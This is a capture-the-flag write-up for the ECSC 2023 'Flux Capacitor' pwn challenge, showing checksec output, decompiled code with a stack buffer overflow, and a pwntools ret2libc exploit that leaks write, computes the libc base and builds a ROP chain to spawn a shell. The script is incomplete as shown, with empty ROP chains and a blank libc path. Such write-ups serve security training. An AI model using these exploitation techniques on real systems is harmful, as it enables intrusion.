ECSC 2023: Flux Capacitor

ECSC 2023 Day 1: Pwn

Table of Contents


This challenge was released near the end of Day 1 yet it’s a much easier pwn challenge than all the other challenges. It is just a straight forward buffer overflow ret2libc challenge.

Flux Capacitor

We run checksec on the binary:

[*] '/mnt/e/ctf_archive/ecsc2023/d1/flux_capacitor/flux_capacitor'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

It has Full RELRO and NX enabled, but no canary or PIE.

We open the binary up in IDA to see that it’s as straight-forward as it gets.

int __fastcall main(int argc, const char **argv, const char **envp)
  char buf[32]; // [rsp+0h] [rbp-20h] BYREF

  setup(argc, argv, envp);
  write(1, "\nFlux capacitor: \n", 0x13uLL);
  write(1, " __         __\n", 0x10uLL);
  write(1, "(__)       (__)\n", 0x11uLL);
  write(1, " \\ \\       / /\n", 0x10uLL);
  write(1, "  \\ \\     / /\n", 0xFuLL);
  write(1, "   \\ \\   / /\n", 0xEuLL);
  write(1, "    \\ \\ / /\n", 0xDuLL);
  write(1, "     \\   /\n", 0xCuLL);
  write(1, "      \\ /\n", 0xBuLL);
  write(1, "      | |\n", 0xBuLL);
  write(1, "      | |\n", 0xBuLL);
  write(1, "      | |\n", 0xBuLL);
  write(1, "      |_|\n", 0xBuLL);
  write(1, "      (_)\n", 0xBuLL);
  write(1, "\n\n[*] Year: [1955]", 0x13uLL);
  write(1, "\n[*] Plutonium ", 0x10uLL);
  write(1, "is not available ", 0x12uLL);
  write(1, "to everoyne.\n", 0xEuLL);
  write(1, "\n[Doc]  : We need ", 0x13uLL);
  write(1, "to find a way to", 0x11uLL);
  write(1, " fill the Flux ", 0x10uLL);
  write(1, "Capacitor with ", 0x10uLL);
  write(1, "energy. Any ideas", 0x12uLL);
  write(1, " Marty?\n[Marty]: ", 0x12uLL);
  read(0, buf, 0x100uLL);
  write(1, "\n[Doc]  : This ", 0x10uLL);
  write(1, "will not work..\n\n", 0x12uLL);
  return 0;

Yep, that’s the whole binary.

We can see that char buf[32] is declared with size 32 but read(0, buf, 0x100uLL); reads 0x100 bytes into buf.

Since this challenge is Full RELRO and NX enabled, we cannot directly execute shellcode nor overwrite GOT, hence we will do ret2libc.

Leak write address and return to main, calculate libc base, then perform ROP chain to pop shell.

from pwn import *
from exploit import *

# set exploit source, context binary, context log_level, libc
elf = context.binary = ELF("../sols/ezpwn/flux_capacitor_patched", checksec=False)
# context.log_level = 'debug'
libc = ELF("./")

# Run binary 1st time
p = exploit_source("../sols/ezpwn/flux_capacitor_patched", "localhost")

rop = ROP(elf)

# find and pop write, then go back to main

payload = flat({0x20: p64(0) + rop.chain()})

p.sendlineafter(b"[Marty]:", payload)

# grab output, calculate libc base
p.recvuntil(b"will not work..\n\n\0")

leak = u64(p.recvn(8))
offset = libc.sym.write
libc.address = leak  - offset
info(f"{hex(leak) =}")
info(f"{hex(offset) =}")
success(f"{hex(libc.address) =}")


# find /bin/sh and call system
rop1 = ROP(libc)

p.sendlineafter(":", flat({ 0x20: p64(0) + rop1.chain() }))


cat flag.txt for the flag.


ECSC 2023: Lady Luck

ECSC 2023 Day 3: Pwn


ECSC 2023: Knife Party

ECSC 2023 Day 1: Pwn
